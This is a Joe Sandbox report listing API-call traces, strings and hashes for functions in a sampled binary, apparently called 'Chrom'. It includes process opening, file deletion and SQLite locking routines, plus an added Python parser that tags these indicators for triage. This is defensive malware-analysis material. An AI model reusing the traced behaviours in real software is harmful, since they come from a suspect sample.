                                                                                                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409D23,?,00000000,?,004101B0,00000000,?,004122A5,00000000), ref: 0040AC45
                                                                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409D23,?,00000000,?,004101B0), ref: 0040AC63
                                                                                                                                                        • wcslen.MSVCRT ref: 0040AC70
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040AC80
                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409D23,?,00000000,?,004101B0,00000000), ref: 0040AC8A
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040AC9A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                        • String ID: Unknown Error$netmsg.dll
                                                                                                                                                        • API String ID: 2767993716-572158859
                                                                                                                                                        • Opcode ID: 65878271f7dde4f835bb4f16d13d15af7b94efba0f9313b390defd79aaf9ef92
                                                                                                                                                        • Instruction ID: 2c1f00bf4471f0602265d83304054939549967734e239daa98e0476f80b6536b
                                                                                                                                                        • Opcode Fuzzy Hash: 65878271f7dde4f835bb4f16d13d15af7b94efba0f9313b390defd79aaf9ef92
                                                                                                                                                        • Instruction Fuzzy Hash: 15014231208210BFFB142B61DE4AEAF7B6CDF01B91F21003AF902B00D1DA385E90D69E
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00408F30
                                                                                                                                                        • memset.MSVCRT ref: 00408F47
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408F6A
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FC3
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FDA
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FED
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409000
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409013
                                                                                                                                                        • wcscpy.MSVCRT ref: 00409022
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409048
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409062
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: strcpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4248099071-0
                                                                                                                                                        • Opcode ID: 3b10a0de6ee468264d86d1eb0d10d9c5d0e098c8a42a896ac47af6df3413975e
                                                                                                                                                        • Instruction ID: 9fcf6790c625b5749f60fa5132a1aa849aae2f3610ed6a5dc53586237da03b21
                                                                                                                                                        • Opcode Fuzzy Hash: 3b10a0de6ee468264d86d1eb0d10d9c5d0e098c8a42a896ac47af6df3413975e
                                                                                                                                                        • Instruction Fuzzy Hash: DA51FCB59007189FDB60DF65C884FDAB7F8BB08314F0045AAE55DE3241DB34AA88CF65
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • unable to open database: %s, xrefs: 00431761
                                                                                                                                                        • cannot ATTACH database within transaction, xrefs: 00431579
                                                                                                                                                        • database is already attached, xrefs: 00431634
                                                                                                                                                        • too many attached databases - max %d, xrefs: 00431563
                                                                                                                                                        • out of memory, xrefs: 00431778
                                                                                                                                                        • attached databases must use the same text encoding as main database, xrefs: 00431682
                                                                                                                                                        • database %s is already in use, xrefs: 004315DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpymemset
                                                                                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                        • API String ID: 1297977491-2001300268
                                                                                                                                                        • Opcode ID: fc04c1ccaf6d060ca3cb3a4a573306b6aac5391b95642690e4c4f6da1e14753e
                                                                                                                                                        • Instruction ID: 41aed9512f3f75185fd37d9d4a788dbe0235547fbfc8844ed61f99ff34c0eb5c
                                                                                                                                                        • Opcode Fuzzy Hash: fc04c1ccaf6d060ca3cb3a4a573306b6aac5391b95642690e4c4f6da1e14753e
                                                                                                                                                        • Instruction Fuzzy Hash: 6091B670A00305AFDB10DF95C481B9ABBF1EF48308F24945FE8559B362D778E941CB59
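The function entries in this part of the report are flat records, and the indicators a reviewer reads out of them by hand (the netmsg.dll plus FormatMessageW error-text routine, MultiByteToWideChar with code page 0xFDE9, the SQLite attach.c error strings, and the 1-byte LockFile/UnlockFile at offset 0x40000000 that appears in the entries that follow) can be extracted mechanically from the exported text. The Python below is an added example written for this page, not Joe Sandbox code: it parses a constructed sample laid out like these entries (condensed from the report, with argument lists and the repeated Associated lines dropped) and tags each recovered function. The section names and the "Name.MODULE(args), ref: ADDR" and ", xrefs: ADDR" layouts are taken from the report; the indicator table, tag names and the FormatMessage flag decoding (winbase.h bit values) are this example's own, and the SQLite attributions (attach.c strings, PENDING_BYTE = 0x40000000) are facts about SQLite, not something the report states.

```python
"""Tag flattened Joe Sandbox function entries with what their API/string
combinations indicate. Added example for this page, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample in the report's own layout, condensed from the entries
# above (argument lists and repeated "Associated" lines dropped).
SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000), ref: 0040AC45
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 0040AC63
• wcslen.MSVCRT ref: 0040AC70
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
APIs
• memset.MSVCRT ref: 00408F30
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409048
APIs
Strings
• cannot ATTACH database within transaction, xrefs: 00431579
• too many attached databases - max %d, xrefs: 00431563
APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 00419836
• Sleep.KERNEL32(00000001), ref: 00419840
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 0041992A
"""

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR"; "?" marks an argument
# the sandbox did not capture. Subcall lines carry a "Part of subcall function" prefix.
API_RE = re.compile(r"^(?:Part of subcall function [0-9A-Fa-f]+: )?"
                    r"(?P<name>[^.(\s]+)\.[A-Za-z0-9]+(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
STR_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Similarity",
            "Joe Sandbox IDA Plugin", "Yara matches"}


@dataclass
class Entry:
    apis: List[Tuple[str, List[str], str]] = field(default_factory=list)  # (name, args, ref)
    strings: List[Tuple[str, str]] = field(default_factory=list)          # (text, xref)
    similarity: Dict[str, str] = field(default_factory=dict)

    def anchor(self) -> str:
        """Lowest address seen in the entry, used as the function's label."""
        refs = [r for _, _, r in self.apis] + [r for _, r in self.strings]
        return min(refs) if refs else "?"


def parse_entries(text: str) -> List[Entry]:
    entries: List[Entry] = []
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:                 # an "APIs" header opens a new function entry
            if line == "APIs":
                entries.append(Entry())
            section = line
            continue
        if not line.startswith("•") or not entries:
            continue
        body, cur = line[1:].strip(), entries[-1]
        if section == "APIs" and (m := API_RE.match(body)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.apis.append((m["name"], args, m["ref"].upper()))
        elif section == "Strings" and (m := STR_RE.match(body)):
            cur.strings.append((m["text"], m["ref"].upper()))
        elif section == "Similarity":
            key, _, val = body.partition(":")
            cur.similarity[key.strip()] = val.strip()
    return entries


# FormatMessage dwFlags bits (winbase.h values).
FM_FLAGS = {0x100: "ALLOCATE_BUFFER", 0x200: "IGNORE_INSERTS", 0x400: "FROM_STRING",
            0x800: "FROM_HMODULE", 0x1000: "FROM_SYSTEM", 0x2000: "ARGUMENT_ARRAY"}


def decode_format_message_flags(value: int) -> List[str]:
    return [name for bit, name in sorted(FM_FLAGS.items()) if value & bit]


def _hex(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:
        return None                          # "?" = not captured by the sandbox


def triage(entries: List[Entry]) -> Dict[str, Dict[str, str]]:
    """Map each entry's anchor address to {tag: detail} for the indicators it shows."""
    report: Dict[str, Dict[str, str]] = {}
    for e in entries:
        found: Dict[str, str] = {}
        for name, args, _ in e.apis:
            if name == "FormatMessageW" and args and _hex(args[0]) is not None:
                flags = _hex(args[0])
                dlls = [a[0] for n, a, _ in e.apis if n == "LoadLibraryExW" and a]
                found["error-text-lookup"] = (f"FormatMessageW flags 0x{flags:X} = "
                    f"{'|'.join(decode_format_message_flags(flags))}; DLLs loaded: {dlls}")
            if name == "MultiByteToWideChar" and args and _hex(args[0]) == 65001:
                found["utf8-conversion"] = "code page 0xFDE9 = 65001 (CP_UTF8)"
            if name in ("LockFile", "UnlockFile") and len(args) >= 4 \
                    and _hex(args[1]) == 0x40000000 and _hex(args[3]) == 1:
                found["sqlite-pending-lock"] = "1-byte lock at 0x40000000: SQLite PENDING_BYTE"
        if any("ATTACH" in s or "attached database" in s for s, _ in e.strings):
            found["sqlite-attach-strings"] = "attach.c error strings: SQLite statically linked"
        if found:
            report[e.anchor()] = found
    return report


if __name__ == "__main__":
    for addr, tags in triage(parse_entries(SAMPLE)).items():
        for tag, detail in tags.items():
            print(f"{addr}  {tag:22} {detail}")
```

Run against the full exported report rather than the sample, the same parser gives one tagged line per recovered function, which is faster to review than scrolling the repeated Memory Dump Source blocks. Note that the sandbox records 0x1100 for the FormatMessageW flags, which decodes to ALLOCATE_BUFFER|FROM_SYSTEM, not FROM_HMODULE (0x800): the traced call formats a system error code, and netmsg.dll is only loaded as a data file (flag 0x2) for a lookup that this particular call does not perform.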

APIs
  • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E428
  • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E436
  • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E447
  • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E45E
  • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E467
• ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E67B
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E697
• memcpy.MSVCRT(?,0045B248,00000014,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?), ref: 0040E6BC
• memcpy.MSVCRT(?,0045B234,00000014,?,0045B248,00000014,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?), ref: 0040E6D0
• ??2@YAPAXI@Z.MSVCRT(00000000,?,004121F5,00000000), ref: 0040E753
• ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004121F5,00000000), ref: 0040E75D
• ??2@YAPAXI@Z.MSVCRT(00000000,?,004121F5,00000000), ref: 0040E795
  • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
  • Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
  • Part of subcall function 0040D5E2: memcpy.MSVCRT(00000000,00000002), ref: 0040D6FA
  • Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
  • Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
  • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
• String ID: ($d
• API String ID: 1140211610-1915259565
• Opcode ID: 22d640288c57e05958ef48d510536d835924167508facb2840f18c0f6a69e3cb
• Instruction ID: 861c2aa1e39ae2bba27ef8b85a75b2e75a9a29af417f25c333be1a6f913ae9ac
• Opcode Fuzzy Hash: 22d640288c57e05958ef48d510536d835924167508facb2840f18c0f6a69e3cb
• Instruction Fuzzy Hash: 3C517FB1601704AFD724DF2AC486B5AB7F8FF48314F10892EE55ACB391DB74E5408B58

APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 00419836
• Sleep.KERNEL32(00000001), ref: 00419840
• GetLastError.KERNEL32 ref: 00419852
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 0041992A
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3015003838-0
                                                                                                                                                        • Opcode ID: 14e06bfcd18a1faaafc00e1b2c20e061f42331a31f2f6822b30b51d360152e16
                                                                                                                                                        • Instruction ID: 6a48cf500290cbfe024f60d9f8fa3e5acb2fed0f29f408aef03af8af8d2d1aa4
                                                                                                                                                        • Opcode Fuzzy Hash: 14e06bfcd18a1faaafc00e1b2c20e061f42331a31f2f6822b30b51d360152e16
                                                                                                                                                        • Instruction Fuzzy Hash: 434115B5028301AFE7209F25CC217A7B3E0AFC1714F10092EF5A552390DB79DDC98A1E
                                                                                                                                                        APIs
                                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045EBC0,00419B91,00000000,?,00000000,00000000), ref: 0041A49F
                                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0041A4A6
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A4B3
                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0041A4C8
                                                                                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045EBC0,00419B91,00000000,?,00000000,00000000), ref: 0041A4D1
                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 0041A4D8
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A4E5
                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0041A4FA
                                                                                                                                                        • free.MSVCRT ref: 0041A503
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2802642348-0
                                                                                                                                                        • Opcode ID: 9713d0eb204f2a511566aa6d075d332d8e1a186ec528611af723e0883a3f4745
                                                                                                                                                        • Instruction ID: f0aea9e426d4f49770c787e6b61ec6af62ac575cb635bed3fd537f80c1297bc8
                                                                                                                                                        • Opcode Fuzzy Hash: 9713d0eb204f2a511566aa6d075d332d8e1a186ec528611af723e0883a3f4745
                                                                                                                                                        • Instruction Fuzzy Hash: 3311063D5062107AC62137306D8D5BF3565879B379B110236EA23922D1DB2C0CE6512F
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(?,&quot;,0000000C,?,?,00000000,0040F92F,?,?,?,<item>), ref: 00416E1C
                                                                                                                                                        • memcpy.MSVCRT(?,&amp;,0000000A,?,?,00000000,0040F92F,?,?,?,<item>), ref: 00416E48
                                                                                                                                                        • memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,0040F92F,?,?,?,<item>), ref: 00416E62
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                                                                        • Opcode ID: d67847fae3f197d59aa4d50c09892c40249a44cebd0e4ea6531cd0ad7979b3c5
                                                                                                                                                        • Instruction ID: d80b0e8a1faee3cf81fd98aea7e87b5c7a6978c7cc7b6d64d1c3866e47b73bb9
                                                                                                                                                        • Opcode Fuzzy Hash: d67847fae3f197d59aa4d50c09892c40249a44cebd0e4ea6531cd0ad7979b3c5
                                                                                                                                                        • Instruction Fuzzy Hash: 940180BAE4472061E6312109CC42FF716599B63716FA3472BFD46252C6E18D89C781AF
                                                                                                                                                        APIs
                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00413909,00000000,00000000), ref: 004154C7
                                                                                                                                                        • memset.MSVCRT ref: 00415529
                                                                                                                                                        • memset.MSVCRT ref: 00415539
                                                                                                                                                          • Part of subcall function 004153A6: wcscpy.MSVCRT ref: 004153CF
                                                                                                                                                        • memset.MSVCRT ref: 00415624
                                                                                                                                                        • wcscpy.MSVCRT ref: 00415645
                                                                                                                                                        • CloseHandle.KERNEL32(?,9A,?,?,?,00413909,00000000,00000000), ref: 0041569B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                        • String ID: 9A
                                                                                                                                                        • API String ID: 3300951397-4291763745
                                                                                                                                                        • Opcode ID: cb1afc34fd9e2d64f19af581a3b5eaedaf59f9c3ee057bb96672fc9edb01fa6c
                                                                                                                                                        • Instruction ID: 195d0570f18187fafaf8b777caec24cc97833dc6dbb2a5a73c5ac716df796b0f
                                                                                                                                                        • Opcode Fuzzy Hash: cb1afc34fd9e2d64f19af581a3b5eaedaf59f9c3ee057bb96672fc9edb01fa6c
                                                                                                                                                        • Instruction Fuzzy Hash: 43511971508740EFD720DF25C888ADBBBE9FBC4344F400A2EF99982251DB75D944CBAA
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040D663
                                                                                                                                                          • Part of subcall function 0040DAD4: memset.MSVCRT ref: 0040DAE7
                                                                                                                                                          • Part of subcall function 0040DAD4: _itow.MSVCRT ref: 0040DAF5
                                                                                                                                                        • wcslen.MSVCRT ref: 0040D681
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
                                                                                                                                                        • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000002), ref: 0040D6FA
                                                                                                                                                          • Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT(00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D57A
                                                                                                                                                          • Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D598
                                                                                                                                                          • Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D5B6
                                                                                                                                                          • Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D5D4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                        • String ID: strings
                                                                                                                                                        • API String ID: 3166385802-3030018805
                                                                                                                                                        • Opcode ID: 83f2c4dafeecc99ee3eef0caec914b4911d667406a77c7368fe1af62c77103f1
                                                                                                                                                        • Instruction ID: b1470fe84c434e0d92e5d9d764ba88a8e864f1e5bfb716432bcb129c57bfcb41
                                                                                                                                                        • Opcode Fuzzy Hash: 83f2c4dafeecc99ee3eef0caec914b4911d667406a77c7368fe1af62c77103f1
                                                                                                                                                        • Instruction Fuzzy Hash: 204160759003019BD71EDF9AED819263365F788306710087AE906972A3DF36EA89CB6D
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040AA3A
• _snwprintf.MSVCRT ref: 0040AA6D
• wcslen.MSVCRT ref: 0040AA79
• memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AA91
• wcslen.MSVCRT ref: 0040AA9F
